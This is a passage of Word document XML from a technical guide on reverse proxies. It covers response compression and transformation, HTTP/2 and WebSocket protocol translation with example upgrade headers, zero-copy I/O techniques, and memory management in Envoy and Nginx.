        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy compresses with Brotli (better compression than gzip for text): 70% size reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE68F0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Sends compressed response with Content-Encoding: br.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3C8685" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client decompresses transparently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C017329" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why at the proxy:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Centralizes compression logic. Each backend doesn't implement it. The proxy can batch-optimize (different compression levels for different content types).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABB35F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response filtering/transformation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D4EA8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>GraphQL gateway: client requests specific fields, proxy strips unrequested fields from the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F4258" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>XML → JSON transcoding: legacy backends return XML, proxy converts to JSON for modern clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F11678" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Field redaction: remove PII fields for certain client roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7ADAB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="6D751CED">
          <v:rect id="_x0000_i3328" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE5C2E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Proxy for Protocol Translation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B30948" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.1 HTTP/1.1 ↔ HTTP/2 Translation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77EE51" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A common pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFE6721" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC71E54" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client ←HTTP/2→ Proxy ←HTTP/1.1→ Backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE33EFA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF3DB15" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Clients benefit from HTTP/2: multiplexing, header compression, server push.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48287B70" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backends may not support HTTP/2 (legacy applications, simpler implementation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5414441D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy translates between protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2885F0DE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the proxy translates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35763071" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends multiple HTTP/2 streams over one connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D36F2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy demultiplexes: each stream becomes a separate HTTP/1.1 request to the backend (over a pooled connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA197DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend responds with HTTP/1.1 responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314BCABC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy multiplexes responses back into the client's HTTP/2 connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AD52DB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 server push at the proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B507D1D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The proxy can push resources to the client (CSS, JS) alongside the HTML response — before the client asks for them. The proxy knows (from configuration) which resources the client will need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCAE69" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 gRPC ↔ REST Translation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BA2C5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Covered in the API Gateway section — the proxy translates between JSON/REST and protobuf/gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29405B5A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.3 WebSocket Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD41DF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the proxy handles WebSocket upgrade:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4C801" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends HTTP Upgrade request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5809867C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00791EC3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>GET /ws HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419DDEE7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Upgrade: websocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D295F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection: Upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA90491" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B210D76" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy recognizes the Upgrade header. Selects a backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E3916" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy forwards the Upgrade request to the backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0FD4D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF233A2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>GET /ws HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3C4B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Upgrade: websocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D87ED" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection: Upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A46FD5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6304F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Backend accepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C22F40" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B9AF0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>HTTP/1.1 101 Switching Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93F096" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Upgrade: websocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158166AA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection: Upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C35C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Sec-WebSocket-Accept: HSmrc0sMlYUkAGmm5OPpG2HaGWk=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B767E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy forwards 101 to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A28F6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>From this point: proxy switches to raw TCP forwarding mode (no more HTTP parsing). Bidirectional frames pass through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A264F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> WebSocket connections can be idle for long periods (waiting for messages). The proxy must have long idle timeouts (or support WebSocket PING/PONG as keepalive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0864BE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="40E3AD4E">
          <v:rect id="_x0000_i3329" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="190DC762" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. High-Performance Proxy Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A6C5E8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Zero-Copy Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59031DD0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Normal proxying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B87CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5E278" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>NIC → Kernel buffer → Copy to userspace buffer → Parse → Copy to kernel buffer → NIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE005D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Four copies. At high throughput, copying becomes the bottleneck (memory bandwidth limited).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420E9C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimized proxying:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB4F951" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD6EAC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>NIC → Kernel buffer → sendfile/splice → Kernel buffer → NIC (zero userspace copy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B7295" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>For content that doesn't need inspection (cached static files, L4 proxying):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E079D84" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Linux sendfile(): copies data directly from one file descriptor to another in kernel space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75328D44" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Linux splice(): moves data between two file descriptors via a kernel pipe buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F627260" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>io_uring: modern async I/O interface that batches operations, reduces syscalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA8C56" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When you can't avoid copies:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> L7 proxies that inspect/modify HTTP content MUST copy to userspace. But even then, techniques like memory-mapped I/O and buffer pools minimize allocation overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76B9AC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Memory Management in High-Performance Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDF432" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's memory model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464DED9E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Uses arena allocation: pre-allocate large memory blocks, carve out small allocations from them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A19CDE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Per-connection buffers: each connection gets a slice of memory for its request/response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BBBA6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Buffer watermarks: if a connection's buffer exceeds a threshold (backpressure), stop reading from the source until the consumer catches up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2AC8B0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Connection-level memory limits: prevents one slow connection from consuming unbounded memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0661EBAC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nginx's memory pools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759ACFE4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Each connection gets a memory pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2656B0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Allocations during request processing come from the pool (extremely fast — just pointer increment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD87755" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>When the request completes, the ENTIRE pool is freed at once (no per-allocation free calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67669FBD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Eliminates fragmentation and reduces allocator overhead.</w:t>
      </w:r>
    </w:p>
